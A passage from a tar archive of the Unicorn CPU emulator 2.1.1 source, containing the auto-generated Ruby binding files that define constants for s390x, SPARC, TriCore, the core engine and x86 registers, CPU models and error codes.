29 UC_RISCV_REG_T4 = 30 UC_RISCV_REG_T5 = 31 UC_RISCV_REG_T6 = 32 UC_RISCV_REG_FT0 = 158 UC_RISCV_REG_FT1 = 159 UC_RISCV_REG_FT2 = 160 UC_RISCV_REG_FT3 = 161 UC_RISCV_REG_FT4 = 162 UC_RISCV_REG_FT5 = 163 UC_RISCV_REG_FT6 = 164 UC_RISCV_REG_FT7 = 165 UC_RISCV_REG_FS0 = 166 UC_RISCV_REG_FS1 = 167 UC_RISCV_REG_FA0 = 168 UC_RISCV_REG_FA1 = 169 UC_RISCV_REG_FA2 = 170 UC_RISCV_REG_FA3 = 171 UC_RISCV_REG_FA4 = 172 UC_RISCV_REG_FA5 = 173 UC_RISCV_REG_FA6 = 174 UC_RISCV_REG_FA7 = 175 UC_RISCV_REG_FS2 = 176 UC_RISCV_REG_FS3 = 177 UC_RISCV_REG_FS4 = 178 UC_RISCV_REG_FS5 = 179 UC_RISCV_REG_FS6 = 180 UC_RISCV_REG_FS7 = 181 UC_RISCV_REG_FS8 = 182 UC_RISCV_REG_FS9 = 183 UC_RISCV_REG_FS10 = 184 UC_RISCV_REG_FS11 = 185 UC_RISCV_REG_FT8 = 186 UC_RISCV_REG_FT9 = 187 UC_RISCV_REG_FT10 = 188 UC_RISCV_REG_FT11 = 189 end��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/s390x_const.rb���������������������������0000664�0000000�0000000�00000005253�14675241067�0026465�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [s390x_const.rb] module UnicornEngine # S390X CPU UC_CPU_S390X_Z900 = 0 UC_CPU_S390X_Z900_2 = 1 UC_CPU_S390X_Z900_3 = 2 UC_CPU_S390X_Z800 = 3 UC_CPU_S390X_Z990 = 4 UC_CPU_S390X_Z990_2 = 5 UC_CPU_S390X_Z990_3 = 6 UC_CPU_S390X_Z890 = 7 UC_CPU_S390X_Z990_4 = 8 UC_CPU_S390X_Z890_2 = 9 UC_CPU_S390X_Z990_5 = 10 UC_CPU_S390X_Z890_3 = 11 UC_CPU_S390X_Z9EC = 12 UC_CPU_S390X_Z9EC_2 = 13 UC_CPU_S390X_Z9BC = 14 UC_CPU_S390X_Z9EC_3 = 15 UC_CPU_S390X_Z9BC_2 = 16 UC_CPU_S390X_Z10EC = 17 UC_CPU_S390X_Z10EC_2 = 18 UC_CPU_S390X_Z10BC = 19 UC_CPU_S390X_Z10EC_3 = 20 UC_CPU_S390X_Z10BC_2 = 21 UC_CPU_S390X_Z196 = 22 UC_CPU_S390X_Z196_2 = 23 UC_CPU_S390X_Z114 = 24 UC_CPU_S390X_ZEC12 = 25 UC_CPU_S390X_ZEC12_2 = 26 UC_CPU_S390X_ZBC12 = 27 UC_CPU_S390X_Z13 = 28 UC_CPU_S390X_Z13_2 = 29 UC_CPU_S390X_Z13S = 30 UC_CPU_S390X_Z14 = 31 UC_CPU_S390X_Z14_2 = 32 UC_CPU_S390X_Z14ZR1 = 33 UC_CPU_S390X_GEN15A = 34 UC_CPU_S390X_GEN15B = 35 UC_CPU_S390X_QEMU = 36 UC_CPU_S390X_MAX = 37 UC_CPU_S390X_ENDING = 38 # S390X registers UC_S390X_REG_INVALID = 0 # General purpose registers UC_S390X_REG_R0 = 1 UC_S390X_REG_R1 = 2 UC_S390X_REG_R2 = 3 UC_S390X_REG_R3 = 4 UC_S390X_REG_R4 = 5 UC_S390X_REG_R5 = 6 UC_S390X_REG_R6 = 7 UC_S390X_REG_R7 = 8 UC_S390X_REG_R8 = 9 UC_S390X_REG_R9 = 10 UC_S390X_REG_R10 = 11 UC_S390X_REG_R11 = 12 UC_S390X_REG_R12 = 13 UC_S390X_REG_R13 = 14 UC_S390X_REG_R14 = 15 UC_S390X_REG_R15 = 16 # Floating point registers UC_S390X_REG_F0 = 17 UC_S390X_REG_F1 = 18 UC_S390X_REG_F2 = 19 UC_S390X_REG_F3 = 20 UC_S390X_REG_F4 = 21 UC_S390X_REG_F5 = 22 UC_S390X_REG_F6 = 23 UC_S390X_REG_F7 = 24 UC_S390X_REG_F8 = 25 UC_S390X_REG_F9 = 26 UC_S390X_REG_F10 = 27 UC_S390X_REG_F11 = 28 UC_S390X_REG_F12 = 29 UC_S390X_REG_F13 = 30 UC_S390X_REG_F14 = 31 UC_S390X_REG_F15 = 32 UC_S390X_REG_F16 = 33 UC_S390X_REG_F17 = 34 UC_S390X_REG_F18 = 35 UC_S390X_REG_F19 = 36 UC_S390X_REG_F20 = 37 UC_S390X_REG_F21 = 38 UC_S390X_REG_F22 = 39 UC_S390X_REG_F23 = 40 UC_S390X_REG_F24 = 41 UC_S390X_REG_F25 = 42 UC_S390X_REG_F26 = 43 UC_S390X_REG_F27 = 44 UC_S390X_REG_F28 = 45 UC_S390X_REG_F29 = 46 UC_S390X_REG_F30 = 47 UC_S390X_REG_F31 = 48 # Access registers UC_S390X_REG_A0 = 49 UC_S390X_REG_A1 = 50 UC_S390X_REG_A2 = 51 UC_S390X_REG_A3 = 52 UC_S390X_REG_A4 = 53 UC_S390X_REG_A5 = 54 UC_S390X_REG_A6 = 55 UC_S390X_REG_A7 = 56 UC_S390X_REG_A8 = 57 UC_S390X_REG_A9 = 58 UC_S390X_REG_A10 = 59 UC_S390X_REG_A11 = 60 UC_S390X_REG_A12 = 61 UC_S390X_REG_A13 = 62 UC_S390X_REG_A14 = 63 UC_S390X_REG_A15 = 64 UC_S390X_REG_PC = 65 UC_S390X_REG_PSWM = 66 UC_S390X_REG_ENDING = 67 # Alias registers end�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/sparc_const.rb���������������������������0000664�0000000�0000000�00000006455�14675241067�0026714�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.rb] module UnicornEngine # SPARC32 CPU UC_CPU_SPARC32_FUJITSU_MB86904 = 0 UC_CPU_SPARC32_FUJITSU_MB86907 = 1 UC_CPU_SPARC32_TI_MICROSPARC_I = 2 UC_CPU_SPARC32_TI_MICROSPARC_II = 3 UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4 UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5 UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6 UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7 UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8 UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9 UC_CPU_SPARC32_TI_SUPERSPARC_II = 10 UC_CPU_SPARC32_LEON2 = 11 UC_CPU_SPARC32_LEON3 = 12 UC_CPU_SPARC32_ENDING = 13 # SPARC64 CPU UC_CPU_SPARC64_FUJITSU = 0 UC_CPU_SPARC64_FUJITSU_III = 1 UC_CPU_SPARC64_FUJITSU_IV = 2 UC_CPU_SPARC64_FUJITSU_V = 3 UC_CPU_SPARC64_TI_ULTRASPARC_I = 4 UC_CPU_SPARC64_TI_ULTRASPARC_II = 5 UC_CPU_SPARC64_TI_ULTRASPARC_III = 6 UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7 UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8 UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9 UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10 UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11 UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12 UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13 UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14 UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15 UC_CPU_SPARC64_NEC_ULTRASPARC_I = 16 UC_CPU_SPARC64_ENDING = 17 # SPARC registers UC_SPARC_REG_INVALID = 0 UC_SPARC_REG_F0 = 1 UC_SPARC_REG_F1 = 2 UC_SPARC_REG_F2 = 3 UC_SPARC_REG_F3 = 4 UC_SPARC_REG_F4 = 5 UC_SPARC_REG_F5 = 6 UC_SPARC_REG_F6 = 7 UC_SPARC_REG_F7 = 8 UC_SPARC_REG_F8 = 9 UC_SPARC_REG_F9 = 10 UC_SPARC_REG_F10 = 11 UC_SPARC_REG_F11 = 12 UC_SPARC_REG_F12 = 13 UC_SPARC_REG_F13 = 14 UC_SPARC_REG_F14 = 15 UC_SPARC_REG_F15 = 16 UC_SPARC_REG_F16 = 17 UC_SPARC_REG_F17 = 18 UC_SPARC_REG_F18 = 19 UC_SPARC_REG_F19 = 20 UC_SPARC_REG_F20 = 21 UC_SPARC_REG_F21 = 22 UC_SPARC_REG_F22 = 23 UC_SPARC_REG_F23 = 24 UC_SPARC_REG_F24 = 25 UC_SPARC_REG_F25 = 26 UC_SPARC_REG_F26 = 27 UC_SPARC_REG_F27 = 28 UC_SPARC_REG_F28 = 29 UC_SPARC_REG_F29 = 30 UC_SPARC_REG_F30 = 31 UC_SPARC_REG_F31 = 32 UC_SPARC_REG_F32 = 33 UC_SPARC_REG_F34 = 34 UC_SPARC_REG_F36 = 35 UC_SPARC_REG_F38 = 36 UC_SPARC_REG_F40 = 37 UC_SPARC_REG_F42 = 38 UC_SPARC_REG_F44 = 39 UC_SPARC_REG_F46 = 40 UC_SPARC_REG_F48 = 41 UC_SPARC_REG_F50 = 42 UC_SPARC_REG_F52 = 43 UC_SPARC_REG_F54 = 44 UC_SPARC_REG_F56 = 45 UC_SPARC_REG_F58 = 46 UC_SPARC_REG_F60 = 47 UC_SPARC_REG_F62 = 48 UC_SPARC_REG_FCC0 = 49 UC_SPARC_REG_FCC1 = 50 UC_SPARC_REG_FCC2 = 51 UC_SPARC_REG_FCC3 = 52 UC_SPARC_REG_G0 = 53 UC_SPARC_REG_G1 = 54 UC_SPARC_REG_G2 = 55 UC_SPARC_REG_G3 = 56 UC_SPARC_REG_G4 = 57 UC_SPARC_REG_G5 = 58 UC_SPARC_REG_G6 = 59 UC_SPARC_REG_G7 = 60 UC_SPARC_REG_I0 = 61 UC_SPARC_REG_I1 = 62 UC_SPARC_REG_I2 = 63 UC_SPARC_REG_I3 = 64 UC_SPARC_REG_I4 = 65 UC_SPARC_REG_I5 = 66 UC_SPARC_REG_FP = 67 UC_SPARC_REG_I7 = 68 UC_SPARC_REG_ICC = 69 UC_SPARC_REG_L0 = 70 UC_SPARC_REG_L1 = 71 UC_SPARC_REG_L2 = 72 UC_SPARC_REG_L3 = 73 UC_SPARC_REG_L4 = 74 UC_SPARC_REG_L5 = 75 UC_SPARC_REG_L6 = 76 UC_SPARC_REG_L7 = 77 UC_SPARC_REG_O0 = 78 UC_SPARC_REG_O1 = 79 UC_SPARC_REG_O2 = 80 UC_SPARC_REG_O3 = 81 UC_SPARC_REG_O4 = 82 UC_SPARC_REG_O5 = 83 UC_SPARC_REG_SP = 84 UC_SPARC_REG_O7 = 85 UC_SPARC_REG_Y = 86 UC_SPARC_REG_XCC = 87 UC_SPARC_REG_PC = 88 UC_SPARC_REG_ENDING = 89 UC_SPARC_REG_O6 = 84 UC_SPARC_REG_I6 = 67 end�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/tricore_const.rb�������������������������0000664�0000000�0000000�00000006221�14675241067�0027242�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [tricore_const.rb] module UnicornEngine # TRICORE CPU UC_CPU_TRICORE_TC1796 = 0 UC_CPU_TRICORE_TC1797 = 1 UC_CPU_TRICORE_TC27X = 2 UC_CPU_TRICORE_ENDING = 3 # TRICORE registers UC_TRICORE_REG_INVALID = 0 UC_TRICORE_REG_A0 = 1 UC_TRICORE_REG_A1 = 2 UC_TRICORE_REG_A2 = 3 UC_TRICORE_REG_A3 = 4 UC_TRICORE_REG_A4 = 5 UC_TRICORE_REG_A5 = 6 UC_TRICORE_REG_A6 = 7 UC_TRICORE_REG_A7 = 8 UC_TRICORE_REG_A8 = 9 UC_TRICORE_REG_A9 = 10 UC_TRICORE_REG_A10 = 11 UC_TRICORE_REG_A11 = 12 UC_TRICORE_REG_A12 = 13 UC_TRICORE_REG_A13 = 14 UC_TRICORE_REG_A14 = 15 UC_TRICORE_REG_A15 = 16 UC_TRICORE_REG_D0 = 17 UC_TRICORE_REG_D1 = 18 UC_TRICORE_REG_D2 = 19 UC_TRICORE_REG_D3 = 20 UC_TRICORE_REG_D4 = 21 UC_TRICORE_REG_D5 = 22 UC_TRICORE_REG_D6 = 23 UC_TRICORE_REG_D7 = 24 UC_TRICORE_REG_D8 = 25 UC_TRICORE_REG_D9 = 26 UC_TRICORE_REG_D10 = 27 UC_TRICORE_REG_D11 = 28 UC_TRICORE_REG_D12 = 29 UC_TRICORE_REG_D13 = 30 UC_TRICORE_REG_D14 = 31 UC_TRICORE_REG_D15 = 32 UC_TRICORE_REG_PCXI = 33 UC_TRICORE_REG_PSW = 34 UC_TRICORE_REG_PSW_USB_C = 35 UC_TRICORE_REG_PSW_USB_V = 36 UC_TRICORE_REG_PSW_USB_SV = 37 UC_TRICORE_REG_PSW_USB_AV = 38 UC_TRICORE_REG_PSW_USB_SAV = 39 UC_TRICORE_REG_PC = 40 UC_TRICORE_REG_SYSCON = 41 UC_TRICORE_REG_CPU_ID = 42 UC_TRICORE_REG_BIV = 43 UC_TRICORE_REG_BTV = 44 UC_TRICORE_REG_ISP = 45 UC_TRICORE_REG_ICR = 46 UC_TRICORE_REG_FCX = 47 UC_TRICORE_REG_LCX = 48 UC_TRICORE_REG_COMPAT = 49 UC_TRICORE_REG_DPR0_U = 50 UC_TRICORE_REG_DPR1_U = 51 UC_TRICORE_REG_DPR2_U = 52 UC_TRICORE_REG_DPR3_U = 53 UC_TRICORE_REG_DPR0_L = 54 UC_TRICORE_REG_DPR1_L = 55 UC_TRICORE_REG_DPR2_L = 56 UC_TRICORE_REG_DPR3_L = 57 UC_TRICORE_REG_CPR0_U = 58 UC_TRICORE_REG_CPR1_U = 59 UC_TRICORE_REG_CPR2_U = 60 UC_TRICORE_REG_CPR3_U = 61 UC_TRICORE_REG_CPR0_L = 62 UC_TRICORE_REG_CPR1_L = 63 UC_TRICORE_REG_CPR2_L = 64 UC_TRICORE_REG_CPR3_L = 65 UC_TRICORE_REG_DPM0 = 66 UC_TRICORE_REG_DPM1 = 67 UC_TRICORE_REG_DPM2 = 68 UC_TRICORE_REG_DPM3 = 69 UC_TRICORE_REG_CPM0 = 70 UC_TRICORE_REG_CPM1 = 71 UC_TRICORE_REG_CPM2 = 72 UC_TRICORE_REG_CPM3 = 73 UC_TRICORE_REG_MMU_CON = 74 UC_TRICORE_REG_MMU_ASI = 75 UC_TRICORE_REG_MMU_TVA = 76 UC_TRICORE_REG_MMU_TPA = 77 UC_TRICORE_REG_MMU_TPX = 78 UC_TRICORE_REG_MMU_TFA = 79 UC_TRICORE_REG_BMACON = 80 UC_TRICORE_REG_SMACON = 81 UC_TRICORE_REG_DIEAR = 82 UC_TRICORE_REG_DIETR = 83 UC_TRICORE_REG_CCDIER = 84 UC_TRICORE_REG_MIECON = 85 UC_TRICORE_REG_PIEAR = 86 UC_TRICORE_REG_PIETR = 87 UC_TRICORE_REG_CCPIER = 88 UC_TRICORE_REG_DBGSR = 89 UC_TRICORE_REG_EXEVT = 90 UC_TRICORE_REG_CREVT = 91 UC_TRICORE_REG_SWEVT = 92 UC_TRICORE_REG_TR0EVT = 93 UC_TRICORE_REG_TR1EVT = 94 UC_TRICORE_REG_DMS = 95 UC_TRICORE_REG_DCX = 96 UC_TRICORE_REG_DBGTCR = 97 UC_TRICORE_REG_CCTRL = 98 UC_TRICORE_REG_CCNT = 99 UC_TRICORE_REG_ICNT = 100 UC_TRICORE_REG_M1CNT = 101 UC_TRICORE_REG_M2CNT = 102 UC_TRICORE_REG_M3CNT = 103 UC_TRICORE_REG_ENDING = 104 UC_TRICORE_REG_GA0 = 1 UC_TRICORE_REG_GA1 = 2 UC_TRICORE_REG_GA8 = 9 UC_TRICORE_REG_GA9 = 10 UC_TRICORE_REG_SP = 11 UC_TRICORE_REG_LR = 12 UC_TRICORE_REG_IA = 16 UC_TRICORE_REG_ID = 32 end�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/unicorn_const.rb�������������������������0000664�0000000�0000000�00000006314�14675241067�0027253�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.rb] module UnicornEngine UC_API_MAJOR = 2 UC_API_MINOR = 1 UC_API_PATCH = 0 UC_API_EXTRA = 255 UC_VERSION_MAJOR = 2 UC_VERSION_MINOR = 1 UC_VERSION_PATCH = 0 UC_VERSION_EXTRA = 255 UC_SECOND_SCALE = 1000000 UC_MILISECOND_SCALE = 1000 UC_ARCH_ARM = 1 UC_ARCH_ARM64 = 2 UC_ARCH_MIPS = 3 UC_ARCH_X86 = 4 UC_ARCH_PPC = 5 UC_ARCH_SPARC = 6 UC_ARCH_M68K = 7 UC_ARCH_RISCV = 8 UC_ARCH_S390X = 9 UC_ARCH_TRICORE = 10 UC_ARCH_MAX = 11 UC_MODE_LITTLE_ENDIAN = 0 UC_MODE_BIG_ENDIAN = 1073741824 UC_MODE_ARM = 0 UC_MODE_THUMB = 16 UC_MODE_MCLASS = 32 UC_MODE_V8 = 64 UC_MODE_ARMBE8 = 1024 UC_MODE_ARM926 = 128 UC_MODE_ARM946 = 256 UC_MODE_ARM1176 = 512 UC_MODE_MICRO = 16 UC_MODE_MIPS3 = 32 UC_MODE_MIPS32R6 = 64 UC_MODE_MIPS32 = 4 UC_MODE_MIPS64 = 8 UC_MODE_16 = 2 UC_MODE_32 = 4 UC_MODE_64 = 8 UC_MODE_PPC32 = 4 UC_MODE_PPC64 = 8 UC_MODE_QPX = 16 UC_MODE_SPARC32 = 4 UC_MODE_SPARC64 = 8 UC_MODE_V9 = 16 UC_MODE_RISCV32 = 4 UC_MODE_RISCV64 = 8 UC_ERR_OK = 0 UC_ERR_NOMEM = 1 UC_ERR_ARCH = 2 UC_ERR_HANDLE = 3 UC_ERR_MODE = 4 UC_ERR_VERSION = 5 UC_ERR_READ_UNMAPPED = 6 UC_ERR_WRITE_UNMAPPED = 7 UC_ERR_FETCH_UNMAPPED = 8 UC_ERR_HOOK = 9 UC_ERR_INSN_INVALID = 10 UC_ERR_MAP = 11 UC_ERR_WRITE_PROT = 12 UC_ERR_READ_PROT = 13 UC_ERR_FETCH_PROT = 14 UC_ERR_ARG = 15 UC_ERR_READ_UNALIGNED = 16 UC_ERR_WRITE_UNALIGNED = 17 UC_ERR_FETCH_UNALIGNED = 18 UC_ERR_HOOK_EXIST = 19 UC_ERR_RESOURCE = 20 UC_ERR_EXCEPTION = 21 UC_ERR_OVERFLOW = 22 UC_MEM_READ = 16 UC_MEM_WRITE = 17 UC_MEM_FETCH = 18 UC_MEM_READ_UNMAPPED = 19 UC_MEM_WRITE_UNMAPPED = 20 UC_MEM_FETCH_UNMAPPED = 21 UC_MEM_WRITE_PROT = 22 UC_MEM_READ_PROT = 23 UC_MEM_FETCH_PROT = 24 UC_MEM_READ_AFTER = 25 UC_TCG_OP_SUB = 0 UC_TCG_OP_FLAG_CMP = 1 UC_TCG_OP_FLAG_DIRECT = 2 UC_HOOK_INTR = 1 UC_HOOK_INSN = 2 UC_HOOK_CODE = 4 UC_HOOK_BLOCK = 8 UC_HOOK_MEM_READ_UNMAPPED = 16 UC_HOOK_MEM_WRITE_UNMAPPED = 32 UC_HOOK_MEM_FETCH_UNMAPPED = 64 UC_HOOK_MEM_READ_PROT = 128 UC_HOOK_MEM_WRITE_PROT = 256 UC_HOOK_MEM_FETCH_PROT = 512 UC_HOOK_MEM_READ = 1024 UC_HOOK_MEM_WRITE = 2048 UC_HOOK_MEM_FETCH = 4096 UC_HOOK_MEM_READ_AFTER = 8192 UC_HOOK_INSN_INVALID = 16384 UC_HOOK_EDGE_GENERATED = 32768 UC_HOOK_TCG_OPCODE = 65536 UC_HOOK_TLB_FILL = 131072 UC_HOOK_MEM_UNMAPPED = 112 UC_HOOK_MEM_PROT = 896 UC_HOOK_MEM_READ_INVALID = 144 UC_HOOK_MEM_WRITE_INVALID = 288 UC_HOOK_MEM_FETCH_INVALID = 576 UC_HOOK_MEM_INVALID = 1008 UC_HOOK_MEM_VALID = 7168 UC_QUERY_MODE = 1 UC_QUERY_PAGE_SIZE = 2 UC_QUERY_ARCH = 3 UC_QUERY_TIMEOUT = 4 UC_CTL_IO_NONE = 0 UC_CTL_IO_WRITE = 1 UC_CTL_IO_READ = 2 UC_CTL_IO_READ_WRITE = 3 UC_TLB_CPU = 0 UC_TLB_VIRTUAL = 1 UC_CTL_UC_MODE = 0 UC_CTL_UC_PAGE_SIZE = 1 UC_CTL_UC_ARCH = 2 UC_CTL_UC_TIMEOUT = 3 UC_CTL_UC_USE_EXITS = 4 UC_CTL_UC_EXITS_CNT = 5 UC_CTL_UC_EXITS = 6 UC_CTL_CPU_MODEL = 7 UC_CTL_TB_REQUEST_CACHE = 8 UC_CTL_TB_REMOVE_CACHE = 9 UC_CTL_TB_FLUSH = 10 UC_CTL_TLB_FLUSH = 11 UC_CTL_TLB_TYPE = 12 UC_CTL_TCG_BUFFER_SIZE = 13 UC_CTL_CONTEXT_MODE = 14 UC_PROT_NONE = 0 UC_PROT_READ = 1 UC_PROT_WRITE = 2 UC_PROT_EXEC = 4 UC_PROT_ALL = 7 UC_CTL_CONTEXT_CPU = 1 UC_CTL_CONTEXT_MEMORY = 2 end��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/version.rb�������������������������������0000664�0000000�0000000�00000000047�14675241067�0026052�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������module Unicorn VERSION = "2.1.1" end �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/x86_const.rb�����������������������������0000664�0000000�0000000�00000121224�14675241067�0026221�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.rb] module UnicornEngine # X86 CPU UC_CPU_X86_QEMU64 = 0 UC_CPU_X86_PHENOM = 1 UC_CPU_X86_CORE2DUO = 2 UC_CPU_X86_KVM64 = 3 UC_CPU_X86_QEMU32 = 4 UC_CPU_X86_KVM32 = 5 UC_CPU_X86_COREDUO = 6 UC_CPU_X86_486 = 7 UC_CPU_X86_PENTIUM = 8 UC_CPU_X86_PENTIUM2 = 9 UC_CPU_X86_PENTIUM3 = 10 UC_CPU_X86_ATHLON = 11 UC_CPU_X86_N270 = 12 UC_CPU_X86_CONROE = 13 UC_CPU_X86_PENRYN = 14 UC_CPU_X86_NEHALEM = 15 UC_CPU_X86_WESTMERE = 16 UC_CPU_X86_SANDYBRIDGE = 17 UC_CPU_X86_IVYBRIDGE = 18 UC_CPU_X86_HASWELL = 19 UC_CPU_X86_BROADWELL = 20 UC_CPU_X86_SKYLAKE_CLIENT = 21 UC_CPU_X86_SKYLAKE_SERVER = 22 UC_CPU_X86_CASCADELAKE_SERVER = 23 UC_CPU_X86_COOPERLAKE = 24 UC_CPU_X86_ICELAKE_CLIENT = 25 UC_CPU_X86_ICELAKE_SERVER = 26 UC_CPU_X86_DENVERTON = 27 UC_CPU_X86_SNOWRIDGE = 28 UC_CPU_X86_KNIGHTSMILL = 29 UC_CPU_X86_OPTERON_G1 = 30 UC_CPU_X86_OPTERON_G2 = 31 UC_CPU_X86_OPTERON_G3 = 32 UC_CPU_X86_OPTERON_G4 = 33 UC_CPU_X86_OPTERON_G5 = 34 UC_CPU_X86_EPYC = 35 UC_CPU_X86_DHYANA = 36 UC_CPU_X86_EPYC_ROME = 37 UC_CPU_X86_ENDING = 38 # X86 registers UC_X86_REG_INVALID = 0 UC_X86_REG_AH = 1 UC_X86_REG_AL = 2 UC_X86_REG_AX = 3 UC_X86_REG_BH = 4 UC_X86_REG_BL = 5 UC_X86_REG_BP = 6 UC_X86_REG_BPL = 7 UC_X86_REG_BX = 8 UC_X86_REG_CH = 9 UC_X86_REG_CL = 10 UC_X86_REG_CS = 11 UC_X86_REG_CX = 12 UC_X86_REG_DH = 13 UC_X86_REG_DI = 14 UC_X86_REG_DIL = 15 UC_X86_REG_DL = 16 UC_X86_REG_DS = 17 UC_X86_REG_DX = 18 UC_X86_REG_EAX = 19 UC_X86_REG_EBP = 20 UC_X86_REG_EBX = 21 UC_X86_REG_ECX = 22 UC_X86_REG_EDI = 23 UC_X86_REG_EDX = 24 UC_X86_REG_EFLAGS = 25 UC_X86_REG_EIP = 26 UC_X86_REG_ES = 28 UC_X86_REG_ESI = 29 UC_X86_REG_ESP = 30 UC_X86_REG_FPSW = 31 UC_X86_REG_FS = 32 UC_X86_REG_GS = 33 UC_X86_REG_IP = 34 UC_X86_REG_RAX = 35 UC_X86_REG_RBP = 36 UC_X86_REG_RBX = 37 UC_X86_REG_RCX = 38 UC_X86_REG_RDI = 39 UC_X86_REG_RDX = 40 UC_X86_REG_RIP = 41 UC_X86_REG_RSI = 43 UC_X86_REG_RSP = 44 UC_X86_REG_SI = 45 UC_X86_REG_SIL = 46 UC_X86_REG_SP = 47 UC_X86_REG_SPL = 48 UC_X86_REG_SS = 49 UC_X86_REG_CR0 = 50 UC_X86_REG_CR1 = 51 UC_X86_REG_CR2 = 52 UC_X86_REG_CR3 = 53 UC_X86_REG_CR4 = 54 UC_X86_REG_CR8 = 58 UC_X86_REG_DR0 = 66 UC_X86_REG_DR1 = 67 UC_X86_REG_DR2 = 68 UC_X86_REG_DR3 = 69 UC_X86_REG_DR4 = 70 UC_X86_REG_DR5 = 71 UC_X86_REG_DR6 = 72 UC_X86_REG_DR7 = 73 UC_X86_REG_FP0 = 82 UC_X86_REG_FP1 = 83 UC_X86_REG_FP2 = 84 UC_X86_REG_FP3 = 85 UC_X86_REG_FP4 = 86 UC_X86_REG_FP5 = 87 UC_X86_REG_FP6 = 88 UC_X86_REG_FP7 = 89 UC_X86_REG_K0 = 90 UC_X86_REG_K1 = 91 UC_X86_REG_K2 = 92 UC_X86_REG_K3 = 93 UC_X86_REG_K4 = 94 UC_X86_REG_K5 = 95 UC_X86_REG_K6 = 96 UC_X86_REG_K7 = 97 UC_X86_REG_MM0 = 98 UC_X86_REG_MM1 = 99 UC_X86_REG_MM2 = 100 UC_X86_REG_MM3 = 101 UC_X86_REG_MM4 = 102 UC_X86_REG_MM5 = 103 UC_X86_REG_MM6 = 104 UC_X86_REG_MM7 = 105 UC_X86_REG_R8 = 106 UC_X86_REG_R9 = 107 UC_X86_REG_R10 = 108 UC_X86_REG_R11 = 109 UC_X86_REG_R12 = 110 UC_X86_REG_R13 = 111 UC_X86_REG_R14 = 112 UC_X86_REG_R15 = 113 UC_X86_REG_ST0 = 114 UC_X86_REG_ST1 = 115 UC_X86_REG_ST2 = 116 UC_X86_REG_ST3 = 117 UC_X86_REG_ST4 = 118 UC_X86_REG_ST5 = 119 UC_X86_REG_ST6 = 120 UC_X86_REG_ST7 = 121 UC_X86_REG_XMM0 = 122 UC_X86_REG_XMM1 = 123 UC_X86_REG_XMM2 = 124 UC_X86_REG_XMM3 = 125 UC_X86_REG_XMM4 = 126 UC_X86_REG_XMM5 = 127 UC_X86_REG_XMM6 = 128 UC_X86_REG_XMM7 = 129 UC_X86_REG_XMM8 = 130 UC_X86_REG_XMM9 = 131 UC_X86_REG_XMM10 = 132 UC_X86_REG_XMM11 = 133 UC_X86_REG_XMM12 = 134 UC_X86_REG_XMM13 = 135 UC_X86_REG_XMM14 = 136 UC_X86_REG_XMM15 = 137 UC_X86_REG_XMM16 = 138 UC_X86_REG_XMM17 = 139 UC_X86_REG_XMM18 = 140 UC_X86_REG_XMM19 = 141 UC_X86_REG_XMM20 = 142 UC_X86_REG_XMM21 = 143 UC_X86_REG_XMM22 = 144 UC_X86_REG_XMM23 = 145 UC_X86_REG_XMM24 = 146 UC_X86_REG_XMM25 = 147 UC_X86_REG_XMM26 = 148 UC_X86_REG_XMM27 = 149 UC_X86_REG_XMM28 = 150 UC_X86_REG_XMM29 = 151 UC_X86_REG_XMM30 = 152 UC_X86_REG_XMM31 = 153 UC_X86_REG_YMM0 = 154 UC_X86_REG_YMM1 = 155 UC_X86_REG_YMM2 = 156 UC_X86_REG_YMM3 = 157 UC_X86_REG_YMM4 = 158 UC_X86_REG_YMM5 = 159 UC_X86_REG_YMM6 = 160 UC_X86_REG_YMM7 = 